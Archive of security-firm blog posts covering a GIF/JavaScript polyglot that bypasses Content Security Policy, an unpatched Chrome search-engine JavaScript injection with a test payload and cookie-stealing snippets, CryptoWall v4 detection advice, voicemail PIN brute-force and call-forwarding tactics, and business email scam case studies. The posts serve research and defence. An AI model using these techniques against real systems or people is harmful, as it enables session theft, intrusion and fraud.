Category Archives: Vulnerability Research

Malicious Memes

The content of this article was also presented by Sam at the 2016 Unrest Conference.

In the past, allowing clients to upload images to your web application was risky business. Nowadays, profile pictures and cat images are everywhere on the Internet and robust procedures exist for handling image uploads, so we can rest assured they protect us from the nasties. Or can we?


Image polyglots are one way to leverage vulnerabilities in web applications and execute malicious scripts in a victim’s web browser. They have the added bonus of bypassing certain security controls designed to mitigate these script injection attacks. This blog will explain how to build an image polyglot and demonstrate how using one can bypass a server’s Content Security Policy (CSP).

Content Security Policy (CSP)

The CSP is set by the web server in the form of a header and informs the user’s browser to only load and execute objects that originate from a certain set of whitelisted places. For example, a common implementation of the CSP header is to ensure the browser only accepts scripts that come from your domain and block the use of inline scripts (i.e., scripts blended directly with other client-side code such as HTML). This CSP is a recommended security header to mitigate the damage caused by Cross-Site Scripting vulnerabilities. The header achieves this by narrowing the attack surface available for malicious scripts to be loaded from. HTML5 Rocks has a great introduction to Content Security Policy if you would like to learn more.

Cross-Site Scripting (XSS)

XSS attacks are a type of web application injection exploit in which an attacker is able to embed their own client side code into a web application and have it rendered in the browser as a part of the webpage. Usually caused by lack of (or poorly implemented) user input sanitation and encoding, attackers use XSS vulnerabilities to inject malicious JavaScript (JS) that can be used to hijack user’s sessions, modify content on the webpage, redirect the visitor to another website or ‘hook’ the victim’s browser. Browser hooking is an attack technique for leveraging XSS vulnerabilities in which the XSS is used to load scripts from a server operated by the attacker which grants greater control over the hooked browser’s behaviour.

XSS is one of the most common web application vulnerabilities and many major websites — including Google, PayPal, eBay, Facebook and the Australian Government’s My Gov site — have been found to have XSS vulnerabilities at some point in time. Reflected XSS is a type of attack in which the injection is reflected back to the victim, rather than being stored on the web server. They are usually executed when a victim is coerced into clicking a link containing the malicious payload. The malicious script is considered to be ‘inline’ with the web application as it is loaded alongside other client side code like Hyper Text Markup Language (HTML) and not from a dedicated JS file. CSP can be configured to deny inline scripts from being executed in the browser which in theory mitigates the dangers of a reflected XSS and protects the user.

CSP in action — and how to get around it

Take for example a web application that allows you to upload and view images and has an aggressive CSP that only permits loading scripts from the application’s domain while denying the use of inline scripts. You’ve found a great reflected XSS vulnerability; however, your payload doesn’t execute because it’s inline and blocked by the CSP. You attempt to upload your payload through the image upload but the web application rejects it for not being a valid image. An image polyglot can help you get around those pesky security controls.


In humans, a ‘polyglot’ is someone who can speaks several languages. In the computer world it means code that is valid in several programming languages.

Figure 1 — Valid ‘C’ programming code

Figure 2 — Valid ‘Perl’ programming code

The code snippets in Figure 1 and Figure 2 are identical and yet also cross-compatible. This is polyglot code and is the underlying mechanism for the attack detailed in this tech blog.

GIF Images

You have more than likely heard of the Graphics Interchange Format (GIF) image type which has the file extension ‘.gif’. The popular image type was invented in 1987 by Steve Wilhite and updated in 1989. It has since come into widespread use on the Internet largely due to its support for animation.

Figure 3 — An animated GIF image

GIF images only support a 256 colour palette for each frame, which is why GIF images often look poor in quality. Each frame of an animated GIF is stored in its entirety making the format inefficient for displaying detailed clips of any longer than a few seconds (incidentally, while the pronunciation is often disputed, I can confirm for you right now it’s pronounced ‘jiff’ after an American brand of peanut butter — no joke).

Figure 4 — The constructs of a GIF image sourced from:

The attack this blog will demonstrate only requires knowledge of the ‘Header’, ‘Trailer’ and ‘Logical Screen Descriptor’ (LSD). The data in between these represent each frame of a GIF image. At least one frame is expected in a valid GIF. All GIF images begin with the signature ‘GIF’ followed by the version represented as ‘87a’ or ‘89a’ in the header.

Figure 5 — The header of a GIF version 89 image in hexadecimal and corresponding human readable ASCII encoded output

The following seven bytes of a GIF image make up the LSD which informs the image decoder of properties that effect the whole image. Firstly, the canvas width and height values which are stored as unsigned 16-bit integers. A ’16-bit unsigned integer’ is a number between 0 and 65,535 that cannot be negative (It wouldn’t make much sense to have a negative canvas size!).

Figure 6 — The LSD of a GIF image sourced from

It is also important to understand that this data in the GIF format is represented in ‘little-endian’ which means the least significant byte is read first by the decoder. In Figure 6 we can see the canvas size is set as width: ‘0A00’ and height: ‘0A00’. While seemingly backwards for humans, little-endian dictates the decoder read the smaller byte first, width: ‘000A’ and height: ‘000A’ which is 10 by 10 pixels. Lastly, the trailer (sometimes referred to as the footer) of the image is represented by hexadecimal ‘3B’ which when encoded as ASCII represents a semicolon.

Figure 7 — The hexadecimal and ASCII encoded output showing the footer of a GIF image

Most image decoders, including browsers, will ignore anything after the trailing semicolon making it a good place to put the bulk of our JS payload. However, if the web application manipulates the image; data after the semicolon will likely be discarded. Hence, it’s important that we can still access the raw/unedited image after it’s uploaded to the server — see the ‘limitations’ section of this blog for more information.

Creating the GIF/JS Polyglot

Figure 8 — Our ‘soon to be JS’ GIF sourced from

To create our malicious image, we are using a small, non-animated GIF image as seen in Figure 7. Its ASCII encoded output is represented below:

Figure 9 — ASCII encoded output of GIF image data

One method of creating GIF/JS polyglots is by manipulating the LSD to begin a JS comment block as seen in Figure 9. After the GIF trailer we close the comment block and include our payload.

Figure 10 — GIF image with JS payload appended

You will notice that in order to implement the ‘/*’ (begin comment block) JS command we have changed the value of the first two bytes of the LSD which correspond to the canvas width. The hexadecimal value of ‘/*’ is ‘2F 2A’ which when interpreted as little-endian by the image decoder is ‘2A 2F = 10799’. While we still have a valid GIF image, it has a pretty whacky canvas size as seen in the output below:

Figure 11 — EXIFtools output of GIF/JS polyglot image showing a canvas size of 10799x10px

However, other than being oddly sized, the image is still perfectly valid and the image decoder will read the rest of the image data normally, disregarding our JS code after the image trailer.

Figure 12 — The GIF/JS polyglot as interpreted by a JS engine

When we try and execute the image as JS the engine reads the GIF header as a variable name, it ignores the comment block and then continues by setting the variable to equal ‘1’ which is just a dummy variable to ensure the JS syntax remains valid. Then our payload is executed.

The image passes standard image validation techniques used by web applications which often rely on confirming the ‘magic numbers’ (a fancier way of saying header) of the image. Once our image is uploaded to the server we effectively have a valid JS file originating from the web application’s domain which falls within the context of the CSP.

As it stands the image is loaded into to the web application through the use of the HTML ‘img’ tag which informs the browser to interpret the data stream as image data. In order to circumvent this and trigger our JS code, we leverage our XSS vulnerability to load the image with the HTML ‘script src’ tag.

Figure 13 — Leveraging the reflected XSS to execute our polyglot

Figure 14 — XSS payload executing in browser bypassing CSP

Why GIFs?

The convenient design structure of the GIF file format allows us to leverage the image header and manipulate the canvas sizes defined in the LSD without destroying the properties of the image for the image decoder.


  • Web applications that restrict image uploads to a certain canvas size can hinder the effectiveness of an image polyglot. Due to the limited number of JS characters that can be used in the LSD the canvas sizes are often unusually large and cannot conform to strict image upload pixel rules.
  • Server side image manipulation that resizes the image will edit the canvas size in the LSD; corrupting our polyglot. If it’s not possible to locate the original unedited image through the web application, then the image will not execute as JS.


While Figure 14 demos a rather mundane script execution it confirms we now have a method of uploading and executing an XSS attack regardless of the CSP directive. The stored JS in our image acts as an uploaded script file satisfying the CSP same origin requirements.

This attack proves that CSP isn’t a catch-all XSS filter and can be circumvented in some cases. In application penetration testing GIF/XSS polyglots are a powerful tool to leverage the consequence of improper output sanitation.

While still recommended, the CSP header should be implemented with the understanding that it’s the last line of defence against XSS attacks that might protect your web app. Ultimately, secure development processes and proper output encoding are the best way to protect web applications against XSS.

Article by Sam Reid, Security Specialist, Hivint

Google Chrome — Default Search Engine Vulnerability


In December 2015, Hivint’s Technical Security Specialist — Taran Dhillon — discovered a vulnerability in Google Chrome and the Chromium browser that allows an attacker to intercept sensitive information, authentication data and personal information from a target user.

This issue has been reported to the Google/Chromium team but as of July 2016 has not been rectified.

The vulnerability in the Chrome browser is due to the “Default Search Engine” functionality not restricting user input and allowing JavaScript code to be inserted and executed. The Default Search Engine functionality allows users to save and configure preferred search engines. When a user performs a search from the web browser by entering the search text directly into the URL bar, the web browser uses the default search settings configured earlier to perform this search.

Chrome Default search settings — with the Google search engine configured as the default search engine

To prevent unintended and unauthorised actions from users, data provided by users should be sanitised and/or restricted to prevent malicious data from being entered. The malicious data consists of malicious code supplied to the browser as Javascript. Input sanitation involves checking the text/characters a user enters and ensuring they do not contain any malicious code.

Combined with the fact that Google Chrome is the most popular web-browser with approx. 71.4% of all internet users, this vulnerability presents a significant security risk.

What is JavaScript and how can it be exploited maliciously?

JavaScript is one of the core programming languages used for web applications and its main function is in modifying the behaviour of web pages. It is extremely flexible and is often used to dynamically change the content on websites to provide a rich user experience.

Although JavaScript is normally used to improve a user’s web experience, it can also be used in malicious ways which include stealing personal information and sensitive data from target users.

Examples of JavaScript that can be used for malicious purposes using the vulnerability discussed in this article are:

  • escape(document.cookie); – Which can be used to steal a user’s browser cookies. Browser cookies contain information about the current user and may include: authentication information (which is generated when a user logs into a website to uniquely identify the user’s session), the contents of a user’s shopping cart (on an e-commerce site) and tracking information (used to track a user’s web-browsing habits, geographic location and source IP address).
  • escape(navigator.userAgent); – Used to display a target user’s web-browser type.
  • escape(document.baseURI); – Contains the URL of the website the user is currently browsing.

The examples above are only a small sample of JavaScript that can be used for malicious purposes with the vulnerability identified in this article.

How to check if you’re vulnerable

To check if your web-browser (Google Chrome / Chromium) is vulnerable, perform the following steps:

  1. Navigate to SettingsManage Search Engines.
  2. Scroll to the bottom of the Other Search Engines table.
  3. Click in the box marked Add a new search engine and enter any text, e.g. poison.
  4. Click in the box marked Keyword and enter any text, e.g. poison.
  5. Click in the box marked URL with %s in place of query and paste in the following text: javascript:window.location=alert(1);
  6. If the colour of the text-box turns from red to white, this indicates your browser is vulnerable.

Exploit Example

Replacing the Chrome “master_preferences” file (a file which is used by Chrome to set all of its default settings) is a method an attacker can use to deliver the exploit to a victim machine.

The code below creates a malicious “master_preferences” file which redirects all searches performed by the victim user to the attacker’s web-server (where the attacker receives the victim’s browser cookies, current browser URL and browser software information) and then sends the victim back to their original Google search.

This results in a seamless compromise of the victim user’s web browser that is extremely difficult for them to detect:

Video Demo

This video demonstrates how the vulnerability can be exploited:

  1. The user is tricked into loading malicious software.
  2. The malicious software containing the exploit is executed on the victim’s machine when the user opens the Chrome browser and searches ‘pwned’ in their browser
  3. Information is transmitted and intercepted by the attacker and the victim is then unknowingly redirected back to their search with the attack remaining undetected

How can I prevent myself from being exploited?

Currently, the only effective mitigation is to uninstall and not use Google Chrome or Chromium. Additionally, do not click on untrusted links on websites or open attachments or links in emails that are unexpected, from untrusted sources or which otherwise seem suspicious.

Article by Taran Dhillon, Security Specialist, Hivint

CryptoWall — Analysis and Behaviours

Key Behaviours of CryptoWall v4

This document details some initial research undertaken by Hivint into the newly released CryptoWall version 4 series of ransomware. A number of organisations we have worked with have experienced infections by CryptoWall and its variants, in some cases leading to severe consequences.

This research paper outlines more information about the latest version of CryptoWall, as well as providing guidance on possible methods for creating custom security controls within your IT environment to mitigate the threat of CryptoWall infections, as well as how to detect and respond to these infections if they do occur. Some lists of known payload sources, e-mail domains and payment pages associated with CryptoWall are also provided at the end of this paper for use in firewall rulesets and/or intrusion detection systems.

CryptoWall version exhibits the following new behaviours:

  • It now encrypts not only the data in your files, but the file names as well;
  • It still includes malware dropper mechanisms to avoid anti-virus detection — but this new version also possesses vastly improved communication capabilities. It still uses TOR, which it may be possible to block with packet-inspection functions on some firewalls. However, it has a modified version of the protocol that attempts to avoid being detected by 2nd generation enterprise firewall solutions.
  • It appears to inject itself into or migrate to svchost.exe and iexplore.exe. It also calls bcdedit.exe to disable the start-up restore feature of Windows. This means the system restore functions that were able to recover data in previous versions of the ransomware no longer work.

Infection Detection

Antivirus detection for this variant is generally very low, but there’s some work on detection taking place. ESET’s anti-virus solution, for example, detects the .js files used by CryptoWall in emails as JS/TrojanDownloader.Agent;

The most reliable method to detect Cryptowall v4 infections when creating rules in intrusion detection systems, firewalls, antivirus systems, or centralised log management servers is to create a rule to alert on creation of the following filenames, which are static within CryptoWall v4:


It’s also worth noting that having in place a comprehensive, regular and consistent backup process for key organisational data is extremely important to combat the threat posed by ransomware such as CryptoWall v4. This will facilitate the prompt restoration of important files, limiting impacts of productivity.

Limiting the risk of Infection

CryptoWall v4 connects to a series of compromised web pages to download the payload. Some of the domain names hosting compromised pages are listed below — a useful step would be to create a regular expression on firewalls and other systems to block access to these domains:


Note that the list of compromised web pages is constantly evolving and so the implemented regular expression will require ongoing maintenance within corporate networks. See the lists at the end for more domains.
In the new version of CryptoWall, infected files have their file names appended with pseudorandom strings. As a result, filename encryption is harder to identify through pure examination of file extension names, unlike past versions of CryptoWall (in which ‘.encrypted’ was appended to the end of encrypted files). Thus, implementing an alert or blocking mechanism becomes more challenging.
However, it is possible to implement regular expression-based rules by considering the executable file names which are downloaded as part of an attempt to infect a system with CryptoWallv4. These are two known to be associated with CryptoWall v4 infections:

It may also be possible to write detection rules to find a static registry key indicating the presence of a CryptoWall infection. This can then be used to search over an entire corporate domain to locate infected machines, or possibly used in anti-virus / IDS signatures. An example is:

  • HKEY_USERSSoftwareMicrosoftWindowsCurrentVersionRun a6c784cb “C:UsersadminAppDataRoaminga6c784cb4ae38306a6.exe

Another step to consider is writing a custom list for corporate firewalls containing the domains that phishing e-mails associated with CryptoWall v4 infections are known to come from, as well as a list of known command-and-control servers. For example, one of the first e-mail domains to be reported was In addition, some of the known command and control hosts that the ransomware makes calls to include:


CryptoWall v4 also makes use of Google’s service for DNS — this behaviour can be taken into account as part of determining whether there are additional security controls that can be implemented to mitigate the risk of infection. In addition, it appears that CryptoWall v4 makes outgoing calls to the following URLs (among others). These may also be useful in developing infection detection controls:

The initial controls we have worked with most customers to implement on their corporate networks included adding a rule to anti-virus detection systems to identify the ransom note file when it is created (i.e.: HELP_MY_FILES.txt). This enables network administrators to be promptly alerted to infections on the network. This is a valuable strategy in conjunction with maintaining lists of known bad domains related to the malware’s infection sources and infrastructure.

Lists of known payload sources, e-mail domains and payment pages associated with CryptoWall

We’ve included the following lists of payload sources, domains and pages associated with Cryptowall v4 infections — which some of our clients have used — to identify activity potentially associated with the ransomware. These can be used in addition to blacklists created and maintained by firewall and IDS vendors:

  • Decrypt Service contains a small list of the IP addresses for the decryption service. This is the page victims are directed to in order to pay the authors of Cryptowall for the decryption keys. These servers are located on the TOR Network but use servers on the regular web as proxies.
  • Email Origin IPs — contains IP addresses of known sources of CryptoWall v4 phishing e-mail origin servers — can be used in developing black lists on e-mail gateways and filtering services.
  • Outgoing DNS Requests — contains a list of IP addresses that CryptoWall v4 attempts to contact.
  • Payload Hosts — contains known sources of infection — including compromised web pages and other infection sources.

CryptoWall associated IP addresses

Article by John McColl, Principal Advisor, Hivint

Voicemail and VOIP

Commonly overlooked security risks


Every company has a phone system of some type, and just like with smartphones, these systems often offer so much more than just basic PABX functionality — technology such as VoIP, video conferencing, Unified Communications platforms, cloud based PABXs are all becoming par for the course. Most, if not all of these systems, also include integrated voicemail functionality.

This article considers some of the avenues through which attackers may look to compromise the security of a company’s phone systems.


There are many reasons attackers may be interested in a company’s phone system, including:

  • Using it to make fraudulent calls;
  • Aiding in social engineering attacks;
  • Eavesdropping on sensitive calls;
  • Harvesting sensitive information from voicemails;
  • Compiling internal directories of company staff; and
  • Attempting to obtain call detail records for market intelligence and industrial espionage.

Complicating matters is that, unlike dedicated VoIP systems and Video Conferencing systems which are often audited and maintained by the IT Security teams, traditional PaBX, IVR and Voicemail systems are often overlooked or fall outside the management purview of the IT and Security teams.

Voicemail is still relied upon for everyday use by many organisations, and sensitive information is commonly left in voicemail messages. A motivated attacker targeting a company is highly likely to be able to gain valuable information by listening to the voicemail of system administrators or executives over a period of time.

With cheap VoIP services being readily available it is also simple for attackers to automate and scale up their attacks to make multiple simultaneous calls and complete them faster. There are many ways to automate phone attacks, and it is easy for an attacker to write a script or use existing software to automate a range of attacks, including those outlined below.

Types of Voicemail and VOIP Attacks

Brute force attacks

Having a four-digit PIN as the de facto standard for voicemail authentication means an attacker will have a reasonable chance at successfully guessing the PIN through manual avenues such as by just using the phone keypad. Even with longer PINs, common patterns and repeating numbers are so commonly used by staff that an attacker is likely to work out the PIN using a PIN list instead of having to manually enter in every possible combination of digits.

In combination with most voice mail and phone systems not supporting account lockouts, nor having other security controls such as logging and alerting, which are commonly applied to other IT systems, undertaking a successful PIN brute force attack to gain access to a staff member’s voicemail box is unlikely to prove difficult to the determined attacker. Additionally, there are also methods to bypass lockout timers in those instances where they are in place. One technique that is almost always successful on large voicemail systems is attempting two or three common PINs against every extension or user account. This would prevent triggering any account lockouts, if implemented.

Once an attack run is complete the attacker may well have access to several voicemail accounts.

Directory reconnaissance

The same automation that can be applied to PIN brute force attacks can also be used for other attacks against phone systems. One example is the creation of internal directories. An attacker can use the “find extension” feature of modern PABXs and voicemail systems to make a list of names, extensions and sometimes job titles within a company. They can also do this by calling and making a note of every greeting for every extension if the PABX doesn’t have a names directory feature.

Call-forwarding attacks

Another use attackers have for voicemail is the call forwarding feature which can be used for free phone calls or to aid in social engineering attacks.

Getting free phone calls is the simplest example. An attacker who has compromised a voicemail box sets up call forward to a mobile phone, overseas or other toll number they want to call, then calls back the local DDI number or the company’s main toll-free number and enters the extension number and waits for the call-forward to connect them to their pre-programmed toll number.

This attack can be reversed as well — an attacker can also use a compromised voicemail box to receive incoming calls using the call forwarding feature to forward calls to a VOIP or pre-paid phone controlled by the attacker.

They then will have control of an extension on that company’s phone system which they can give to external parties to call back on to appear like they are inside the company’s office, which can be an invaluable means to facilitate the commission of a further social engineering attack.

Leveraging Caller ID

Most phone systems, when call-forwarding is used, display the caller-ID of the voicemail extension rather than the number of the originating party.

An attacker may be able to leverage the call-forward feature to masquerade as a known external party, such as appearing to be a known vendor or to be calling from inside the target company’s building. This can gain greater traction for social engineering purposes.

On a penetration testing engagement some years ago, my colleagues and I took over a manager’s extension at corporate headquarters and set up a call forward to the security desk at one of their rural sites. We called ahead to the security desk to add our names to the visitor register. The security desk asked very few questions because their phone displayed the call as originating from the manager’s phone at the organisation’s headquarters.

When we arrived, the security desk was expecting us and allowed us to enter without any restrictions.


The attacks scenarios above relate to simple voicemail systems, which most people overlook, considering them to a straightforward way to store and retrieve messages. However, when you include customer facing IVRs, VoIP systems, PABX systems, Teleconferencing and Video Conferencing systems, Unified Communications systems, call-queue management systems and the endless other applications of modern phone systems, then the possible vulnerabilities that can be exploited by attackers are almost endless.

Large companies often own a block of numbers, generally in lots of ten thousand. It is a good idea to periodically audit these number blocks to classify all lines, then performing an audit of possible attack vectors of all the phone systems connected to them.

Practicing the same security hygiene for voicemail that you do for other systems is critical, for example:

  • Disabling default accounts;
  • Auditing voicemail boxes for common PIN’ or disallowing common or simple PINs;
  • Setting a minimum PIN length of six digits;
  • Setting unique temporary PINs when provisioning new voicemail boxes;
  • Setting up lockout timers that don’t lose their state over multiple calls;
  • Disabling call forwarding features;
  • Restricting allowed forwarding numbers to local mobiles and landlines only;
  • Deactivating unused voicemail boxes; and
  • Applying logging and alerting if possible.

With some phone systems this is often easier said than done. We hope this article gets you thinking about how your company uses and manages phone systems and how they might be abused by attackers if appropriate vigilance is not exercised.

Article by John McColl, Principal, Hivint

The Growth of the Business Email Scams Threat

In the last year, there has been a trend towards the commission of payment scams that target employees of companies by attempting to convince them to transfer money to cyber criminals. Commonly referred to as business email compromise (BEC) scams, they generally involve scammers sending emails that appear to come from senior staff at an organisation (hence sometimes being referred to as “CEO fraud”) and requesting that a sum of money be transferred to a third party’s bank account (controlled by the scammers). Brian Krebs has written about these attempts in his blog, here and here. According to the Federal Bureau of Investigation (FBI), these scams have generated reported losses of $1.2 billion internationally between October 2013 and August 2015.

Two recent examples of these scams reported to us by our clients demonstrate the different types of organisations that can be targeted by these scams.

The first scam described below targeted a sporting club and demonstrates how a business email scam can be executed in a relatively simple and innocuous fashion. The second is an example of a slightly more complex version targeted at a financial technology company that required more effort to execute, and which ultimately needed execution of the company’s incident response plan to investigate and resolve the incident.

Case Study — A Sports Club is Targeted

The first business email scam targeted a small sporting club that had published the contact details and roles for all of its board members on its website. This meant the scammer had to exercise a minimum amount of effort in order to craft the scam — all the contact details and roles for the board members were clearly available. Initial contact was made by the scammer via email (posing as the President) to the Treasurer, John, to start the conversation.

In this case, the Treasurer became suspicious and was quick-thinking enough to call the President to seek verbal confirmation of the transfer request. This gave the game away and revealed that the club was being scammed.

Hivint was contacted to provide further analysis and advice on the email scam, as the club staff members who were targeted in the scam were unsure if the scam indicated a system compromise or similar. Once the emails were received, a simple check of the email headers (below) of the original email identified the ruse.

As the email headers reveal, the “Authenticated sender” or real scammer’s email was different from the address shown in the actual email. A google search shows to have been used before in scams.

In addition, the “Reply-To” address of did not actually belong to the club’s President, and directed the target’s response to an email address controlled by the scammer. A check of the return email address when responding would also have given this away.

The Second Scam — A Financial Technology Company

The next occurrence of a business email scam that Hivint was made aware of came from a financial technology company we work with. They had received a phishing email similarly requesting money from the financial team.

This attempt took more effort as the scam clearly involved more research and customisation by the scammer.

While the content of the email was consistent with most business email scams (see below), there were some distinguishing features which contributed to the scam almost being successful.

In this case, the attacker registered a domain with a very similar domain to the target business — an extra letter was added to the domain name — e.g. was registered as This meant that the reply-to address closely resembled an email address that belonged to the company’s actual registered domain name, making the scam harder to detect unless anything more than a cursory examination of the reply-to address was undertaken.


There are a number of attacks which are high volume/low value. For example, attempting to force payment through cryptolocker only works if the price is within the victim’s “pain point” or ability to pay. The business email scam, however, has no force behind the request for payment. The scam only works if the victim doesn’t know they’re getting scammed. And this takes effort, which means that the payoff has to be worth it for the perpetrator.

Even spending a few weeks on researching a victim and crafting an attack for a five figure payout would still be highly profitable for a scammer, and a growing $1.2 billion pot of money derived from these scams shows that they can be lucrative.

That there is continuing growth in these scams demonstrates that this threat is worth countering, and there are some fairly basic steps to undertake should you want to reduce the risk of these types of attacks occurring at your company, and the likelihood that they will be successful.


Exercise proper security hygiene to protect your online identity.

Don’t publish the contact details and position names of specific staff on publicly accessible places on the internet; particularly staff with payment-related responsibilities. Instead, use an email form that sends to a generic email address — — and distribute emails to relevant personnel from there.

Separation of Duties

Should a request come to an individual for payment of a sum of money (whether for an invoice or otherwise), a check should be made that the payment is in fact legitimate (e.g. through verbal confirmation, or confirmation there is an associated Purchase Order number or invoice) and approved by a relevant authority.
Basically, no business processes should fundamentally tie the receipt of an email with a money transfer.

Security Awareness

Ensure education on email scams is included in your organisational security awareness program.

Check your registered domains

Andrew Horton’s URLCrazy (included in Kali Linux) can be used to keep an eye on domains registered with similar domain names to your business.
Buy the domains that you can, and consider blocking emails from similar domains already registered, or generating an alert should an email arrive from these domains.

And Finally

Remember, if something about an email doesn’t seem right, making simple checks that you’re corresponding with a legitimate sender will go a long way to ensure you are not defrauded. In particular:

  • Double check whom you’re actually responding to — if the reply address for the email is different once you’ve hit “reply” then it may have been sent by a scammer. If the email looks legitimate, then check the spelling of the email address to ensure the domain name is not misspelt.
  • Contact the purported sender of the email using a known telephone number (i.e. not a contact number given in the email) before executing any money transfers. Even if an attacker has gone out of their way not to just spoof an email address, but has control of your entire IT environment, using an “out-of-band” method to contact the legitimate person can help verify the authenticity of the email.

And finally, should you still fall victim to a payment scam, contact your financial institution as soon as possible.

By Ben Waters, Senior Security Advisor at Hivint. For more of Hivint’s latest cyber security research, as well as to access our extensive library of re-usable cyber security resources for organisations, visit Security Colony